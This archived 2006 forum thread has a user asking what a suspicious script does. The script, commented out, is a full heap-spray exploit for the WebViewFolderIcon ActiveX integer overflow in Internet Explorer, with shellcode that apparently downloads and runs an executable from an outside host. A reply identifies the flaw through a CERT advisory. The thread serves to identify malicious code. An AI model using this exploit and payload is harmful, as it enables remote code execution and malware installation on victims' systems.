What is this script doing?

Discussion in 'Javascript' started by V S Rawat, Oct 17, 2006.

  1. V S Rawat

    V S Rawat Guest

    Could someone please give me some idea what this script is doing.

    It might be some malicious script that might have been used to spread
    virus or to hack username/ password, hence it has been ### so that it
    can't be run by default.

    thanks.

    <!-- <html>
    ###<body>
    ###<script>
    ### var heapSprayToAddress = 0x05050505;
    ### var shellcode = unescape("%u9090"+"%u9090"+
    ###"%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320" +
    ###"%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2" +
    ###"%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b" +
    ###"%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b" +
    ###"%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u4300%u5c3a" +
    ###"%u2e55%u7865%u0065%uc033%u0364%u3040%u0c78%u408b" +
    ###"%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c40" +
    ###"%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec83" +
    ###"%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6fe8" +
    ###"%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353%ueb52" +
    ###"%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83ff" +
    ###"%u04ec%u2c83%u6224%ud0ff%u7ebf%ue2d8%ue873%uff40" +
    ###"%uffff%uff52%ue8d0%uffd7%uffff%u7468%u7074%u2f3a" +
    ###"%u6d2f%u686f%u6973%u776e%u6265%u6973%u6574%u632e" +
    ###"%u2e6f%u6b75%u622f%u6e69%u3264%u652e%u6578%u0000");
    ###var heapBlockSize = 0x400000;
    ###var payLoadSize = shellcode.length * 2;
    ###var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
    ###var spraySlide = unescape("%u0505%u0505");
    ###spraySlide = getSpraySlide(spraySlide,spraySlideSize);
    ###heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
    ###memory = new Array();
    ###
    ###for (i=0;i<heapBlocks;i++)
    ###{
    ### memory = spraySlide + shellcode;
    ###}
    ###for ( i = 0 ; i < 128 ; i++)
    ###{
    ### try
    ### {
    ### var tar = new
    ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
    ### tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
    ### }
    ### catch(e){}
    ###}
    ###
    ###function getSpraySlide(spraySlide, spraySlideSize)
    ###{
    ### while (spraySlide.length*2<spraySlideSize)
    ### {
    ### spraySlide += spraySlide;
    ### }
    ### spraySlide = spraySlide.substring(0,spraySlideSize/2);
    ### return spraySlide;
    ###}
    ###
    ###</script>
    ###</body>
    ###</html>
    ### -->
    --
     
    V S Rawat, Oct 17, 2006
    #1
    1. Advertisements

  2. V S Rawat

    denisb Guest

    "The Microsoft Windows WebViewFolderIcon ActiveX control contains an
    integer overflow vulnerability. This may allow a remote, unauthenticated
    attacker to execute arbitrary code on a vulnerable system."

    in <http://www.kb.cert.org/vuls/id/753044>
     
    denisb, Oct 17, 2006
    #2
    1. Advertisements

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments (here). After that, you can post your question and our members will help you out.